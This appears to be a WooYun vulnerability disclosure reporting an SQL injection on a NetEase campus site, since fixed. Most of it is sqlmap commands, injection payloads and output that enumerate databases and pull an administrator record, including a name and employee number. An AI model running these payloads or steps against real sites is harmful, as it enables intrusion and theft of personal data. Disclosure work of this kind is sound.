乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
网易某站点 SQL 注入漏洞
http://op.campus.163.com/adm/selectcate.do?flags=1,2 上面链接存在 SQL 注入漏洞可以获取数据库数据
$ ./sqlmap.py -u "http://op.campus.163.com/adm/selectcate.do?flags=1,2" --dbs ……[*] starting at 23:04:20[23:04:20] [INFO] resuming back-end DBMS 'mysql'[23:04:20] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: flags (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flags=1,2) AND 1129=1129 AND (6317=6317 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: flags=1,2) AND SLEEP(5) AND (3809=3809---[23:04:20] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11[23:04:20] [INFO] fetching database names[23:04:20] [INFO] fetching number of databases[23:04:20] [INFO] resumed: 2[23:04:20] [INFO] resumed: information_schema[23:04:20] [INFO] resumed: recruitavailable databases [2]:[*] information_schema[*] recruit
$ ./sqlmap.py -u "http://op.campus.163.com/adm/selectcate.do?flags=1,2" --sql-shell ……[*] starting at 23:07:02[23:07:02] [INFO] resuming back-end DBMS 'mysql'[23:07:02] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: flags (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: flags=1,2) AND 1129=1129 AND (6317=6317 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: flags=1,2) AND SLEEP(5) AND (3809=3809---[23:07:02] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.11[23:07:02] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTERsql-shell> select * from adminer limit 1;[23:07:05] [INFO] fetching SQL SELECT statement query output: 'select * from adminer limit 1'[23:07:05] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself[23:07:05] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns[23:07:05] [INFO] fetching current database[23:07:05] [INFO] resumed: recruit[23:07:05] [INFO] fetching columns for table 'adminer' in database 'recruit'[23:07:05] [INFO] resumed: 9[23:07:05] [INFO] resumed: username[23:07:05] [INFO] resumed: gonghao[23:07:05] [INFO] resumed: cnname[23:07:05] [INFO] resumed: email[23:07:05] [INFO] resumed: permitgroup[23:07:05] [INFO] resumed: createtime[23:07:05] [INFO] resumed: lasttime[23:07:05] [INFO] resumed: lastip[23:07:05] [INFO] resumed: status……[23:07:05] [INFO] resumed: 唐璜[23:07:05] [INFO] resumed: 2011-06-29 10:50:41[23:07:05] [INFO] resumed: [email protected][23:07:05] [INFO] resumed: 8705[23:07:05] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[23:07:05] [INFO] retrieved:[23:07:07] [INFO] resumed: 2011-06-29 10:50:41[23:07:07] [INFO] resumed: 1[23:07:07] [INFO] resumed: 3[23:07:07] [INFO] resumed: 10911select * from adminer limit 1;: '唐璜, 2011-06-29 10:50:41, [email protected], 8705, , 2011-06-29 10:50:41, 1, 3, 10911'sql-shell>
1. 对 flags 进行过滤
危害等级:中
漏洞Rank:8
确认时间:2015-12-03 14:53
漏洞已修复,感谢您对网易产品的关注。
暂无
